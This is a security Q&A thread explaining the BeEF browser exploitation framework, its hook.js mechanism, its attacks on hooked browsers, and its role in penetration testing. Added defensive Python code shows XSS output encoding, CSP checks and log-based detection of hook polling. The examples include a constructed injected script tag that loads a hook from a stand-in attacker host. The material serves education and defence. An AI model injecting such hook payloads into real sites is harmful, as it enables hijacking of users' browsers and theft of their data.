I have recently come across BeEF, a browser exploitation tool. In most of the articles, it is said time and again that it is developed for research and pen test purposes! Has anyone worked with this tool? (If so, can you give a working understanding, or please point to some links where they have explained more real-life examples.)
What purpose does it have in real world? I am curious to know how it would enhance the security in an organization.
At about 37-38 mins into [this video](http://www.youtube.com/watch?v=jkZ2MOpI0BU), they go over it. It is basically like metasploit but for web sites/apps. – Garrett Fogerlie Apr 02 '13 at 10:08
4 Answers
Alright, BeEF is a framework similar to Metasploit. BeEF uses a JavaScript file, hook.js, which, when executed by a browser, gives a hook to BeEF. With a hooked browser, similar to Metasploit, you have an array of exploits in front of you. Some of them are viewing cookies and browser history, up to the more sophisticated attacks of getting a shell. I know for a fact that there is a shell exploit that uses a JBoss vulnerability.
So, how the attack works is as follows: the client visits a malicious page which contains BeEF's hook.js script, or the script can be executed via an XSS attack. When this is executed, you can see that a browser is hooked to you on your BeEF control panel and, thereafter, launch exploits.
More details: BeEF launches a BeEF instance, which is a combination of the UI server (the UI which is used to launch attacks and shows the various exploits) and the communications server, which coordinates and communicates with the hooked browsers. These two servers in collaboration make BeEF work.
BeEF has a very clean interface, organizing attacks based on type and also indicating whether a particular attack is relevant to a browser (IE, FF, Chrome etc.). So you can just point and click on the attacks to launch.
> What purpose does it have in real world? I am curious to know how it would enhance the security in an organization.
It can be used as a serious pen test tool. In most cases, when you demonstrate an XSS to a client (assuming you're a pen tester), it does not have that much of an impact when you show them a silly pop-up. On the other hand, if you demonstrate XSS using BeEF, now that will give them a scare.
Further reading: http://code.google.com/p/beef/wiki/WindowsInstall
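To make the mechanism in the answer above concrete from the defender's side, here is an added example (not code from the answer or from the BeEF project): a reflected-XSS search handler in its vulnerable form beside a hardened form that applies output encoding and a Content-Security-Policy header, with a deliberately minimal CSP evaluator used only to compare the two. The hosts `app.example` and `attacker.example`, the `hook.js` URL and the injected tag are constructed placeholders.

```python
# Added example (not code from the original answer): a reflected-XSS handler in
# vulnerable and hardened form, plus a deliberately minimal CSP check used to
# show why the hardened response would not load an injected external script.
# "attacker.example" and "app.example" are constructed placeholder hosts.
import html
from typing import Callable, Dict, List, Tuple
from urllib.parse import urlparse

PAGE_ORIGIN = "https://app.example"
# Constructed payload: an injected tag pointing at an external hook script.
HOOK_URL = "http://attacker.example/hook.js"
INJECTED_TAG = f'<script src="{HOOK_URL}"></script>'

Response = Tuple[str, Dict[str, str]]


def vulnerable_search(query: str) -> Response:
    """Reflects the query into the HTML verbatim: a reflected XSS."""
    body = f"<h1>Results for {query}</h1>"
    return body, {"Content-Type": "text/html"}


def hardened_search(query: str) -> Response:
    """Same page with output encoding and a CSP limiting scripts to our own origin."""
    body = f"<h1>Results for {html.escape(query, quote=True)}</h1>"
    headers = {
        "Content-Type": "text/html",
        # No 'unsafe-inline' and no foreign hosts: injected script tags,
        # inline or external, are refused by the browser.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    }
    return body, headers


def script_allowed_by_csp(csp: str, script_url: str, page_origin: str) -> bool:
    """Minimal CSP evaluation for an external script URL: honours script-src
    (falling back to default-src) with 'self', '*' and plain host sources only.
    Real browsers implement far more of the spec; this is just enough to
    compare the two handlers above."""
    directives: Dict[str, List[str]] = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0]] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True  # no applicable directive: the browser loads it
    script_host = urlparse(script_url).netloc
    for source in sources:
        if source == "*":
            return True
        if source == "'self'":
            if script_host == urlparse(page_origin).netloc:
                return True
            continue
        if not source.startswith("'"):
            host_source = source if "://" in source else "//" + source
            if urlparse(host_source).netloc == script_host:
                return True
    return False


def would_load_hook(handler: Callable[[str], Response], query: str) -> bool:
    """True if the handler's response contains the injected tag unescaped
    and its CSP (if any) permits loading the script from that host."""
    body, headers = handler(query)
    tag_present = f'src="{HOOK_URL}"' in body
    return tag_present and script_allowed_by_csp(
        headers.get("Content-Security-Policy", ""), HOOK_URL, PAGE_ORIGIN)


if __name__ == "__main__":
    print("vulnerable loads hook:", would_load_hook(vulnerable_search, INJECTED_TAG))
    print("hardened loads hook:  ", would_load_hook(hardened_search, INJECTED_TAG))
```

Output encoding alone removes this particular injection; the CSP is the second layer, so that a script tag slipping through some other path (a stored field, a template bug) still cannot pull code from a host the policy does not list.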
BeEF is an exploitation tool (offensive), of course. Given so, when you power up BeEF and you hook a page, you get to see little colour codes, which invariably tell you the extent of vulnerability of the page (which works and is invisible, right through to which is visible). It is however NOT a vulnerability assessment tool. It complements one.
In the real world, it is probably step 4 or 5 in a pen testing exercise, whereby once you ascertain the probable vulnerabilities (Nessus, OpenVAS), you start the offensive on the weaknesses. This is where BeEF comes into the picture.
While I do not have direct experience with this tool, I can say that an exploitation toolkit will not directly enhance the security of an organization. That is, this is an offensive tool, not a defensive tool. How offensive tools can be, and often are, used is as a means to help guide your defensive posture.
Offensive tools, like BeEF or Metasploit and to a lesser extent Nessus, are used to find vulnerabilities in your organization's defenses. Once you know about the holes, you can start building out defensive measures to counteract them. The measures may be implementing a patch management system, hardening your systems and applications, tightening down (installing?) firewalls, creating a user training program, or any other project that is intended to reduce your risk profile.
Are you sure that BeEF helps to find vulnerabilities? I thought that it's an exploit kit: once you find a vulnerability, then you can fire up BeEF, and BeEF will help automate the process of doing damage (e.g., exfiltrating cookies, spoofing pages, etc.). Have I misunderstood? – D.W. Nov 11 '12 at 23:48
@D.W.: I suppose I was drawing a pretty fine line between finding vulnerabilities and exploiting them. Like I said, I've never used BeEF, I was only extrapolating based on what little I read. – Scott Pack Nov 12 '12 at 00:45
I have to agree with Scott. BeEF has very limited use as a pentest tool. It is a great attack tool, however, as practically any browser that loads the hook script will get hooked. To prevent this, you will have to disable JavaScript from running in your browser.
If you happen to be running the BeEF server, hooked browsers will show up in the dashboard whenever a victim visits the site hosting your JavaScript hook. You can configure BeEF to create persistent cookies on the victim machine that will survive a simple cookie-cache clearing. So long as the target machine has a browser window open running the BeEF hook code, the attacker will have access to the victim's browser. It is during this window that an attacker would have to initiate additional exploits from within the BeEF framework to maintain a persistent connection after the browser window is closed.
BeEF is not good as a pentesting tool, as currently mitigation of the attack vector requires expecting all web browsers within an organization to run without JavaScript enabled. As the majority of websites (including this one) use JavaScript for functionality, that is not likely to happen.
I think you are confusing penetration testing with vulnerability assessment. BeEF is not for vulnerability assessment, for the very reasons you list. However, it is great for pentesting because it lets the organization see the full impact of vulnerabilities in their web applications, as well as training their network operators to recognize an XSS exploit in progress. – bonsaiviking Nov 10 '12 at 03:49
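The last answer notes that a hooked browser stays reachable only while a window running the hook code is open, and the comment above suggests training network operators to recognize such an exploit in progress. As an added example (not from either poster, and not BeEF's own code or endpoints), here is a small detector that runs over constructed web-proxy log lines and flags two signals an operator could watch for: a fetch of a script named hook.js from a host outside an allowlist, and regular polling from one client to one external host for as long as the page stays open. The log format, the hostnames, the `/poll` path and the allowlist are all constructed for this example.

```python
# Added example (not from the original answers): a detector over constructed
# proxy log lines that flags (a) a hook.js fetch from an unlisted host and
# (b) regular client-to-host polling ("beaconing"). The log format, hosts,
# "/poll" path and allowlist are constructed, not taken from any real tool.
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple, Tuple
from urllib.parse import urlparse

# Constructed proxy log: "timestamp client method url status".
# 10.0.0.5 loads a page, fetches hook.js from an outside host, then polls it
# every 5 seconds; 10.0.0.7 browses a news site at irregular intervals.
SAMPLE_LOG = """\
2012-11-10T03:40:00 10.0.0.7 GET http://news.example/index.html 200
2012-11-10T03:40:01 10.0.0.5 GET http://app.example/search?q=beef 200
2012-11-10T03:40:02 10.0.0.5 GET http://attacker.example/hook.js 200
2012-11-10T03:40:07 10.0.0.5 POST http://attacker.example/poll 200
2012-11-10T03:40:12 10.0.0.5 POST http://attacker.example/poll 200
2012-11-10T03:40:17 10.0.0.7 GET http://news.example/story/1 200
2012-11-10T03:40:17 10.0.0.5 POST http://attacker.example/poll 200
2012-11-10T03:40:22 10.0.0.5 POST http://attacker.example/poll 200
2012-11-10T03:40:27 10.0.0.5 POST http://attacker.example/poll 200
2012-11-10T03:41:03 10.0.0.7 GET http://news.example/story/2 200
2012-11-10T03:41:04 10.0.0.7 GET http://news.example/css/site.css 200
2012-11-10T03:44:20 10.0.0.7 GET http://news.example/story/3 200
"""

# Constructed allowlist of hosts the organization expects to serve scripts.
ALLOWED_SCRIPT_HOSTS = {"app.example", "news.example"}


class Event(NamedTuple):
    ts: datetime
    client: str
    method: str
    host: str
    path: str


LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def parse_log(text: str) -> List[Event]:
    """Parse the constructed log format; malformed lines are skipped, not fatal."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, method, url, _status = m.groups()
        u = urlparse(url)
        events.append(Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
                            client, method, u.netloc, u.path))
    return events


def find_hook_fetches(events: List[Event],
                      allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> List[Tuple[str, str]]:
    """(client, host) pairs where a script named hook.js came from an unlisted host."""
    return [(e.client, e.host) for e in events
            if e.path.endswith("/hook.js") and e.host not in allowed_hosts]


def find_beaconing(events: List[Event], min_requests: int = 5,
                   max_cv: float = 0.25) -> Dict[Tuple[str, str], float]:
    """Map (client, host) -> mean gap in seconds for pairs whose request timing
    is regular enough to look like polling: at least min_requests requests and
    a coefficient of variation (stdev / mean) of the gaps no greater than max_cv."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for e in events:
        by_pair[(e.client, e.host)].append(e.ts)
    findings: Dict[Tuple[str, str], float] = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:  # all requests in the same second: not a polling pattern
            continue
        if statistics.pstdev(gaps) / mean <= max_cv:
            findings[pair] = mean
    return findings


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("hook.js from unlisted host:", find_hook_fetches(evs))
    print("regular polling:", find_beaconing(evs))
```

On the sample log the hook fetch and the five-second polling by 10.0.0.5 are both flagged, while the irregular browsing by 10.0.0.7 is not. The thresholds are starting points; on real proxy data you would tune `min_requests` and `max_cv` against legitimate auto-refreshing pages before alerting on them.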